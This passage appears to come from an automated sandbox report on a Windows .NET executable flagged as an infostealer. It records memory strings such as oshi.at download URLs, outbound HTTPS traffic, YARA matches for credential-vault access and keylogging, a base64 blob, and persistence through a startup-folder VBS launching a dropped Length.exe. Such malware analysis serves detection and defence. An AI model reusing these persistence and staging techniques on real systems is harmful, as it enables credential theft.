                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Length.exe, 0000000B.00000002.4611018046.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000002FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/YBbz
                      Source: Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/YBbzd
                      Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.atD
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61115 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61113 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61114 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61115
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61090 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61092 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:61094 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61106 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61113 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61114 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61115 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61116 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61117 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056FF160 NtResumeThread,0_2_056FF160
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056FF158 NtResumeThread,0_2_056FF158
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C42770_2_026C4277
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026CB8E80_2_026CB8E8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C3EE30_2_026C3EE3
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C7C680_2_026C7C68
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C82000_2_026C8200
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026CB8E60_2_026CB8E6
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026CB8E00_2_026CB8E0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026CE9E80_2_026CE9E8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C81F80_2_026C81F8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C81F00_2_026C81F0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C7C640_2_026C7C64
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C7C580_2_026C7C58
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F8C180_2_056F8C18
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F3B300_2_056F3B30
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F3C240_2_056F3C24
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F8C080_2_056F8C08
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056FB4ED0_2_056FB4ED
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F3B200_2_056F3B20
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D3C180_2_061D3C18
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D5FF80_2_061D5FF8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D5FE80_2_061D5FE8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061EAEA80_2_061EAEA8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061E00400_2_061E0040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061E88F00_2_061E88F0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061E73F10_2_061E73F1
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061EBBE00_2_061EBBE0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06215EC00_2_06215EC0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062100400_2_06210040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062119A30_2_062119A3
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06215EB10_2_06215EB1
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621E4410_2_0621E441
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621E4500_2_0621E450
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06213D080_2_06213D08
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06213D180_2_06213D18
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062100360_2_06210036
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062100380_2_06210038
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621001F0_2_0621001F
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062180B20_2_062180B2
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062180C00_2_062180C0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062E00400_2_062E0040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062E16480_2_062E1648
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062E03670_2_062E0367
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0631E8100_2_0631E810
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315E650_2_06315E65
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315EB90_2_06315EB9
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06317EE80_2_06317EE8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06317ED80_2_06317ED8
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0631F7C00_2_0631F7C0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063194280_2_06319428
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063194180_2_06319418
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063100070_2_06310007
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063170700_2_06317070
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063170610_2_06317061
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_063100400_2_06310040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_064100400_2_06410040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_064100060_2_06410006
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_064100380_2_06410038
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0641003C0_2_0641003C
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_066BF6680_2_066BF668
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_066BF9480_2_066BF948
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_066A00400_2_066A0040
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_066A00060_2_066A0006
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_066BDD800_2_066BDD80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0294E5006_2_0294E500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02944A906_2_02944A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0294AA106_2_0294AA10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02943E786_2_02943E78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0294DC986_2_0294DC98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029441C06_2_029441C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065CA1986_2_065CA198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D56406_2_065D5640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D66686_2_065D6668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D24186_2_065D2418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D7DF06_2_065D7DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065DC2006_2_065DC200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065DB2B06_2_065DB2B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D77106_2_065D7710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065DE4186_2_065DE418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D5D706_2_065D5D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D00406_2_065D0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D001D6_2_065D001D
                      Source: C:\Users\user\AppData\Roaming\Length.exeCode function: 11_2_01293EE011_2_01293EE0
                      Source: Ref#66001032.exeStatic PE information: invalid certificate
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000000.2133964230.0000000000530000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereff.exe: vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3513479654.0000000005D80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIwbfmq.dll" vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3460243396.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#66001032.exe
                      Source: Ref#66001032.exeBinary or memory string: OriginalFilenamereff.exe: vs Ref#66001032.exe
                      Source: Ref#66001032.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#66001032.exe, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: Length.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Ref#66001032.exe, -.csBase64 encoded string: 'icZB75V29O1X/Zx+uctb9J41m8xB/p15tsYJ3JVvn9FG6YlaqcxX9pJ3o4RV/oREnMpe9756t9oJ9IBEk9FX6oV6ttZG4st8v8tt15V1vctaoLd+rutL65VdqNBf05F1vtNXoJd+ruB8+p1+4fZc/5VjldkJyZV6vuxG6Zl1vYRz/5QgvdpGxKB0qdZG8p914dhX769Yr81A/p5vntBf+pl14exX77R6rt4JqMAr44kJ2oNov9JQ94lIv81E/oIgidZf65x+m8xB/p15tsZ344B3tc1X6ct5u91X94Z24cxf9Jt+rtpB7w=='
                      Source: Length.exe.0.dr, -.csBase64 encoded string: 'icZB75V29O1X/Zx+uctb9J41m8xB/p15tsYJ3JVvn9FG6YlaqcxX9pJ3o4RV/oREnMpe9756t9oJ9IBEk9FX6oV6ttZG4st8v8tt15V1vctaoLd+rutL65VdqNBf05F1vtNXoJd+ruB8+p1+4fZc/5VjldkJyZV6vuxG6Zl1vYRz/5QgvdpGxKB0qdZG8p914dhX769Yr81A/p5vntBf+pl14exX77R6rt4JqMAr44kJ2oNov9JQ94lIv81E/oIgidZf65x+m8xB/p15tsZ344B3tc1X6ct5u91X94Z24cxf9Jt+rtpB7w=='
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/108@2/3
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Local\Temp\excel_doc.xlsxJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                      Source: Ref#66001032.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#66001032.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#66001032.exeVirustotal: Detection: 38%
                      Source: Ref#66001032.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile read: C:\Users\user\Desktop\Ref#66001032.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#66001032.exe "C:\Users\user\Desktop\Ref#66001032.exe"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Length.exe "C:\Users\user\AppData\Roaming\Length.exe"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Length.exe "C:\Users\user\AppData\Roaming\Length.exe"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: wintypes.dllJump to behavior
